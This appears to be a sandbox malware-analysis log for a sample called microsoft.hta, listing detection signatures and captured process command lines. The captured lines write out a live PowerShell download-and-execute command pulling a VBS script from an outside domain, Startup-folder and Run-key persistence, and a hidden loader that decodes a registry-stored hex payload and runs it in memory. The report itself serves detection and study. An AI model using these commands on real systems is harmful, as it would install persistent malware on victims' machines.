Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

Show sources

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: microsoft.hta

virustotal: Detection: 10%

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\Desktop\microsoft.hta'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: unknown unknown

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: iexplore.pdb UGP source: mshta.exe, 00000001.00000003.1823878968.02A7E000.00000004.sdmp
Source:	Binary string: scrrun.pdb source: wscript.exe, 00000006.00000002.2059560819.006A0000.00000002.sdmp
Source:	Binary string: iexplore.pdb UGP source: mshta.exe, 00000001.00000003.1620046534.001D3000.00000004.sdmp, microsoft.hta
Source:	Binary string: wscript.pdb source: wscript.exe, 00000006.00000002.2058746695.002B0000.00000002.sdmp
Source:	Binary string: wscript.pdbN source: wscript.exe, 00000006.00000002.2058746695.002B0000.00000002.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1650297060.018E0000.00000002.sdmp, powershell.exe, 00000007.00000002.2065449016.01C10000.00000002.sdmp

Data Obfuscation:

Powershell starts a process from the temp directory

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''	Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
